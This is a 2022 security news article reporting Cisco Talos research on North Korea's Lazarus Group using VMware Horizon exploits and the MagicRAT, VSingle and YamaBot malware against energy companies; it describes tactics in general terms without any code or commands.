Posted on September 8, 2022 at 8:41 PM

Malicious State Actor Lazarus Starts New Campaign With MagicRAT Malware

Notorious North Korean nation-state actor Lazarus Group has been connected to a new remote access Trojan known as MagicRAT.

The report revealed that the threat group is exploiting VMWare Horizon servers to have access to the corporate networks of energy providers in Japan, Canada, and the United States.

Lazarus is a nation-state threat actor notorious for carrying out cyber espionage, cryptocurrency stealing, and data theft campaigns over the past decade. The hacking syndicate has been linked to hundreds of high-level attacks internationally.

Security researchers at Cisco Talos stated that Lazarus targeted energy organizations between February and July 2022, using VMWare Horizon exploits to gain initial access.

After gaining initial access, they utilized custom malware families such as “YamaBot” and “VSingle”, as well as “MagicRAT”, a previously unknown remote access Trojan (RAT) used to steal data from breached devices.

Security researchers at Symantec analyzed the same hacking activities earlier in April this year while researchers at ASEC did their analysis in May. But Cisco provided a much deeper report on the activities of the threat actor concerning the attack. It unveiled several details about the activities of the threat actor.

The Lazarus Group Utilized Multiple Attack Methods

Cisco Talos also noted that the threat actors are now utilizing multiple attack strategies. This illustrates Lazarus’ latest procedures, tactics, and techniques and shows the versatility of the highly skilled and experienced hacking group.

At first, the hacking syndicate exploited vulnerable servers to Log4Shell flaws. It ran a shellcode that established a reverse shell that ran arbitrary commands on the breached endpoint.

Lazarus was able to deactivate Windows Defender through registry key modifications, Powershell commands, and WMIC before deploying VSingle.

The Hackers Are Using Different Attacking Methods

The VSingle backdoors offer support to advanced network reconnaissance commands. It also performs other functions such as setting up a reverse shell connection, creating new admin users on the host, and preparing the environment for stealing credentials. These actions are connected to the control server (C2) to create plugins that enrich its functionality.

The report also presented a second case that concerns a different victim, although it follows similar access and reconnaissance pattern to the first approach. However, this time, the threat actor planted MagicRAT along with VSingle.

Talos has also published another post on MagicRAT which provided details of all the functions of the previously unknown trojan.

According to the report, MagicRAT is capable of establishing persistence on its own by executing hardcoded commands that created the required scheduled tasks. It also gathers additional malware from the C2 server and helps in system reconnaissance.

For the third attack, the threat actor used YamaBot, a custom malware that featured RAT capabilities written in GO.

The RAT Capabilities Include Uninstalling Itself

The standard RAT capabilities include executing arbitrary commands on the endpoints, downloading files from remote locations, sending process information to C2, and listing files and directories. It also has the capability of uninstalling itself.

The attack chain diversification of Lazarus is not limited to the final malware payloads. It also extends to the reverse or proxy tunneling tools and credential harvesting methods.

Also, the report revealed that in some instances, Lazarus deployed the Procdump and Mimikatz tools. But in others, they retrieved copies of the registry hives that contain AD credentials.

The researcher pointed out an instance where the threat actors tried to exfiltrate Active Directory information on one endpoint through PowerShell cmdlets. But the next day, the threat actors utilized the adfindexe to extract similar details on the same endpoint.

The reason for these different attack methods is to bring in different abuse patterns which will make it more difficult to attribute, detect, and defend the attack.

As reported in the post, cybersecurity firms are closely monitoring Lazarus, so they are always looking to diversify their attack chain options. If they stick to one attack strategy, it will be easier for cybersecurity firms to identify and block them. As a result, they will keep evolving their attack patterns to remain under the radar for as long as possible.

Lazarus’ diversification in attack is also reflected in its various targets, including IT job seekers. It also includes the use of ransomware as decoys, the creation of trojanized development tools, and the creation of fake crypto trading apps. It also illustrates their capacity to launch massive attacks with heavy financial gains, such as the $620 million cryptocurrency heist from the Ronin incident.